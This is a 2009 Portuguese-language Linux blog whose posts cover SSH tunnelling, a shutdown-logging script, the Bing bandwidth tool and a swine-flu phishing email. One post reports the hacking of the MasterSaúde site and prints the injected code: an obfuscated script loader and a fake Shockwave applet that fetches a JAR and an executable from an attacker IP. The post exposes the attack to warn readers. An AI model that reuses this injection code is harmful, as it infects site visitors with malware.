Estrutura da árvore de diretórios do Linux

Categorias:Linux Tags:

Como fazer um tunel com SSH

Fonte: http://www.guilhermecunha.com.br/wiki/doku.php?id=como-fazer-tunel-ssh-tunelamento-remoto-seguranca-criptografado-comunicacao

Vou mostrar como fazer um tunel SSH para acessar uma máquina remota e utilizar algum serviço da rede ou algum programa que escute em alguma porta.

Exemplo:

ssh -f guilhermecunha@SERVIDOR-REMOTO -L 1030:SERVIDOR-REMOTO:80 -N

Mas o que esta linha faz?

Esta execução irá fazer com que eu faça login na máquina remota via ssh e faça um tunelamento para a porta 80 usando a porta 1030 localmente. Ou seja, depois de executar este comando vou puder acessar a máquina remota através da porta 1030 da seguinte forma:

http://SERVIDOR-LOCAL:1030

Sendo que o serviço na máquina remota está rodando na porta 80

Categorias:Linux Tags:

Site da MasterSaúde hackeado.

outubro 19, 2009 Deixe um comentário

Hoje aconteceu algo curioso.

Estava eu fazendo pesquisas em sites de planos de saúde, quando entro no site da MasterSaúde (http://www.mastersaude.com.br), recebo uma mensagem que não possuo o Flash Player instalado, veja na figura:

site_mastersaude

WTF?? Tenho instalado o Flash Player, o que será?

Peguei o código fonte e dei uma vasculhada, mandei o pro Miguel di Ciurcio Filho (http://osysadmin.blogspot.com) pois ele já havia descoberto um worm no site da Vivo, então ele achou no rodapé o seguinte código:

<script type=”text/javascript”>
<!­­
document.write(unescape(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”))
// ­­>
</script>

Descodificando com o Python:

imPython 2.6.2 (release26­maint, Apr 19 2009, 01:56:41)
[GCC 4.3.3] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.
>>> import urllib
>>>
urllib.unquote(“%3C%73%63%72%69%70%74%20%74%79%70%65%3D
%22%74%65%78%74%2F%6A
%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A
%2F%2F%32%30%34%2E%33%2E%31%35%36%2E%32%34%36%2F%6A%73%2F%67%6C
%6F%62%61%6C%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E”)
‘<script type=”text/javascript”
src=”http://204.3.156.246/js/global.js”></script>&#8217;

Conteúdo do arquivo global.js:

/* Setar IP atual logo abaixo */
var url = “204.3.156.246”;
document.write(‘<applet name=”Seu Computador não possui Adobe Shockwave
Player clique em RUN para proseguir ­ ©Adobe Shockwave Player Version
11.5.0.600″ code=”Main.class” archive=”http://&#8217; + url +
‘/js/FlashPlayer.jar” height=”10″ width=”1″><param name=”link”
value=”http://&#8217; + url + ‘/js/install_flash_player_ax.exe”></applet>’);

Eeeeeta… site hackeado…

Categorias:Sites

Revista Espírito Livre

setembro 29, 2009 Deixe um comentário

A revista Espírito Livre é uma publicação mensal e digital sobre Software Livre.

Confesso que a descobri hoje, atualmente a revista se encontra na 6a edição.

Aconselho à todos, pois ela tem um conteúdo muito rico.

Neste mês a notícia principal é “Edição de Vídeo em ambientes Linux”.

Acesse http://www.revista.espiritolivre.org/ e garanta já a sua.

Categorias:Linux Tags:

Monitorando hora de desligamento de servidores Linux.

agosto 25, 2009 Deixe um comentário

Imagine você saindo na sexta-feira de seu trabalho, quando volta na segunda seus servidores estão desligados, e agora? Como saber quando eles foram desligados?

Fiz um pequeno script para que eu saiba a hora exata em que o servidor foi desligado, os passos que darei foram feitos em servidores Debian 5.0 “Lenny”, mas funcionam perfeitamente bem em qualquer distribuição, desde que você adapte os passos.

Crie os arquivos necessários:

# touch /var/log/monitorar.log

# touch /var/log/turnoff.log

# touch /etc/init.d/registro

Adicionei no crontab a seguinte linha:

*/1 * * * * /bin/date > /var/log/monitorar.log

Com esta linha, o comando date será executado de 1 em 1 minuto, e sua saída será adicionada no arquivo /var/log/monitorar.log, note que a linha não será adicionada no arquivo, pois estou utilizando somente 1 sinal lógico “>“, e sim, sobrescreverá o conteúdo existente no arquivo.

Adicionei o script registro no diretório /etc/init.d/ com o seguinte conteúdo:

# vim /etc/init.d/registro

#!/bin/bash

REGISTRO=$(cat /var/log/monitorar.log)

echo “Desligado em: $REGISTRO” > /var/log/turnoff.log

Ele irá ler o conteúdo do arquivo /var/log/monitorar.log e adicionará no arquivo /var/log/turnoff.log, pois quando você reiniciar a máquina, o crontab irá executar a linha do date e sobrescreverá o conteúdo do /var/log/monitorar.log, e não é isso que você quer, você quer saber a hora real do desligamento do seu servidor.

Feito isso, configure o script como executável:

# chmod +x /etc/init.d/registro

E configure para executar no boot:

# update-rc.d registro defaults

Para testar, aguarde 1 minuto, marque a hora atual e reinicie sua máquina:

# date && shutdown -r now

Marque a hora, após a reinicialização, veja se a hora guardada no arquivo /var/log/turnoff.log confere com a hora que você marcou:

# cat /var/log/turnoff.log

Se tudo deu certo, agora você terá a hora exata que seu servidor foi desligado, por qualquer que tenha sido o motivo.

Abraços.

Categorias:Linux Debian Tags:

Bing: Medindo velocidade da conexão no Linux

agosto 25, 2009 Deixe um comentário

Conhecendo e instalando o Bing no Linux

Para entender melhor a função do mesmo, imagine que em sua casa ou na empresa na qual você possa ser um colaborador, umas das ferramentas de comunicação ou de transporte de arquivos pesados é uma prática de prioridade 0.
Empresas de publicidade e propaganda, que utilizam em grande escala o transporte de imagens com uma resolução de extremo tamanho, GIFs animados, arquivos de mp3 etc. Com crescente fluxo de sua rede as conexões de 100MB/s acabam não trabalhando com a mesma proporção e o que valerá é a capacidade de conexão de um ponto ao outro (Host_A <==> Host_B). Ficamos às vezes imaginando qual é o motivo de determinadas variações inexplicáveis em nossa rede na hora de uma transferência de determinado conteúdo.
O Bing utiliza o protocolo ICMP naturalmente, emitindo um pacote ICMP com pedido de resposta e analisa a mudança resultante do RTT. Variando um pouco o RTT, o Bing faz medidas de cada múltiplo que está sendo medido.O envio de pacote pelo Bing só é possível por que ele utiliza o icmp_dev, onde o sistema de exploração não é o único permitido para fazer envio de pacote, naturalmente usaria sockets primários para essa finalidade, mas o Winsock não suporta os soquetes primários (no caso do Windows).

Instalando o Bing no Linux ou em derivados de Unix

O Bing é um programa bem conhecido no mundo open source e muitos administradores de redes o utilizam para seus fins. Um dos objetivos da comunidade de software livre em geral é facilitar a vida dos usuários para que os mesmos não passem parte de seu tempo compilando pacotes, por isso as distribuições de ponta já incluem um vasto “cardápio” de programas em seu mirror.
Com o Bing não é diferente. Ele está bem enraizado em vários mirrors. Para instalar o Bing mostraremos duas formas convencionais que já sabemos. A primeira compilando o pacotes e outra através do mirror padrão.
Para fazer o download do arquivo tar.gz entre na seguinte URL:

http://www.boutell.com/lsm/lsmbyid.cgi/002078vv

A forma de instalação é simples, entre no diretório em que foi feito o download e descompacte o arquivo e de os seguintes comandos:

$ make
# make install

Em meras oportunidades de instalar o Bing através dos mirrors, vale lembrar a distro que está usando no momento, seja ela derivada do Debian ou Red Hat.

# apt-get install bing (para os derivados do Debian)
# urpmi bing (para os derivados do Red Hat)

Após instalado, podemos agora ver algumas de suas utilidades e seu funcionamento. Em muitos casos não são usados todos os seus parâmetros, mas isso não significa que o Bing não seja poderoso. Existem casos que administradores de redes possuem um conjunto de ferramentas específicas para realizar sua tarefas diárias, onde se aplica-se o seguinte ditado popular: “cada caso, é um caso”.

Medindo a conexão

Iniciando então o uso do software, experimente dar o seguinte comando para testar a velocidade de sua conexão:

bing ip_maquina_local ip_gateway

Exemplo:

# bing 192.168.0.168 192.168.0.1

Em seguida de Ctrl+c para que ele possa retornar a estatística, o qual na saída padrão exibirá todos os resultados de sua pesquisa. No final dos resultados será apresentando o valor, ou seja, o tamanho do link.

— estimated link characteristics —

host bandwidth ms

warning: rtt big 192.168.0.168 0.013ms < rtt small 192.168.0.168 0.015ms

192.168.0.1 21.787Mbps 0.121

Esse procedimento é o mais correto para medir a conexão, pois ela mede a conexão real entre dois hosts, ao contrário de alguns métodos que algumas pessoas usam. É possível também determinarmos o tamanho do pacote enviado dando o seguinte comando:

# bing -S 1000 192.168.0.168 192.168.0.1

Cuidado! Não aumente muito o tamanho do pacote porque isto pode provocar a fragmentação/remontagem do IP sobre a ligação para medir o *or* nas ligações intermediárias, ao qual acima as medidas tomadas. Se você permanece abaixo de 1400 bytes, você está seguro (exceto no SLIP lig onde você não deve ultrapassar 1000).
Com a opção -v podemos também verificar tamanho de bytes que são disparados para fazer o pedido de resposta, entendendo que ele joga dois valores para que possa se fazer a leitura precisa, disparando 72 bytes e 136 bytes.
Existem casos em que a medição não será precisa no caso de algumas conexões discadas, por exemplo devido a imitação do hardware.
Em casos de ligações saturadas o bing trabalha medindo rtts, onde na hora da medida haverá um atraso mínimo na hora de fazer a leitura do pacote. Conexões IP/X25 fazem a capsulagem em pacotes pequenos, por isso é muito difícil saber a capacidade “exata” porque o consumo geral pelo pacote do IP não são fixas e não variam com o tamanho de pacote. Entretanto um Bing inteligente poderia encontrar o tamanho encapsulating lentamente aumentando o tamanho de pacote e detectando etapas no RTT.
Sabendo as perdas do pacote em host 1 e em host 2, é possível computar a perda entre os mesmos.
O Bing tem o poder de calcular determinadas perdas, mas vale ressaltar que essas perdas são despresíveis, em relação ao resultado obtido na saída padrão. Está é uma das diversas ferramentas que o mundo de código aberto pode lhes apresentar.

Fonte: http://www.vivaolinux.com.br/artigo/Bing-Medindo-velocidade-da-conexao-no-Linux

Categorias:Linux Tags:

E-mail sobre gripe traz vírus digital

agosto 16, 2009 Deixe um comentário

Uma nova mensagem que  chega por e-mail, com o pretexto de fornecer informações sobre a Gripe Suína, traz links para sites maliciosos, com a intenção de infectar o computador da vítima com vírus.

090814_1

Esse é um exemplo típico de phishing scam, ou golpe da pescaria, uma isca criada por cibercriminosos para fisgar os desatentos. Típico porque aproveita algum assunto quente no noticiário, mas apesar de bem feitinho, sempre traz alguma inconsistência ou erro gramatical. No caso dessa mensagem, por exemplo há erros de concordância e informações claramente falsas sobre a prevenção da doença.

O outro o e-mail falso, com o título “Gripe Suína – Sintomas, Contágio, Prevenção no Brasil”, finge ser enviado do endereço “exame@globo.com”. A mensagem traz um texto curto e nos convida a clicar em um link com mais informações. Mas esse link, que leva para o endereço “http://gripesuina.notlong.com/” na verdade baixa um arquivo executável que contamina o computador com vírus.

No caso, além do português canhestro e do uso do trema, eliminado com a recente reforma ortográfica, a principal inconsistência vem do falso remetente “exame@globo.com”, já que a revista “Exame” fica abrigada no portal da Editora Abril, e não no da Rede Globo…

Categorias:Pragas Digitais Tags: